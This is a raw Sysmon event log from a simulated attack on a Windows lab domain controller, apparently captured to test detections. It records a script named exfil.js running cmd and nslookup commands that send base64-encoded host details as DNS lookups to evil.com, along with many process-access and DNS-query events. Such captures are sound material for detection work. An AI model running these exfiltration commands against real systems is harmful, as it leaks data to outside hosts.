14:16:16.018{00000000-0000-0000-0000-000000000000}5436evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.867{00000000-0000-0000-0000-000000000000}7052evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.737{00000000-0000-0000-0000-000000000000}1344evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.547{00000000-0000-0000-0000-000000000000}7848evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.420{00000000-0000-0000-0000-000000000000}5912evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.343{00000000-0000-0000-0000-000000000000}7948evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000196726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000196724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.280{00000000-0000-0000-0000-000000000000}7576evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000196723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.580{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-DE3E-000000005F02}3724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.580{2E1864BB-17B1-629A-DC3E-000000005F02}40604004C:\Windows\system32\cmd.exe{2E1864BB-17B1-629A-DE3E-000000005F02}3724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.589{2E1864BB-17B1-629A-DE3E-000000005F02}3724C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B1-629A-DC3E-000000005F02}4060C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbvsc.tmp 2>&1 10341000x8000000000000000196718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.565{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B1-629A-DD3E-000000005F02}3776C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.549{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B1-629A-DD3E-000000005F02}3776C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.549{2E1864BB-17B1-629A-DD3E-000000005F02}37764768C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-DC3E-000000005F02}4060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000196715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.549{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=37EC6ABFDC4263FC6CBAEBDC168C18FD,SHA256=51087F664E1D62C05EAF125CFD2206ADC34D46FBF97022013F9F57C0F631FD83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.534{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-DD3E-000000005F02}3776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.534{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-DC3E-000000005F02}4060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.533{2E1864BB-17A1-629A-783D-000000005F02}55527256C:\Windows\System32\WScript.exe{2E1864BB-17B1-629A-DC3E-000000005F02}4060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.533{2E1864BB-17B1-629A-DC3E-000000005F02}4060C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbvsc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.481{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqmjl.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.434{2E1864BB-17B1-629A-DA3E-000000005F02}9848032C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-DB3E-000000005F02}7544C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.429{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.429{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.428{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.428{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.428{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-DB3E-000000005F02}7544C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.427{2E1864BB-17B1-629A-D93E-000000005F02}77884228C:\Windows\system32\cmd.exe{2E1864BB-17B1-629A-DB3E-000000005F02}7544C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.427{2E1864BB-17B1-629A-DB3E-000000005F02}7544C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B1-629A-D93E-000000005F02}7788C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqmjl.tmp 2>&1 10341000x8000000000000000196697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.380{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B1-629A-DA3E-000000005F02}984C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.380{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B1-629A-DA3E-000000005F02}984C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 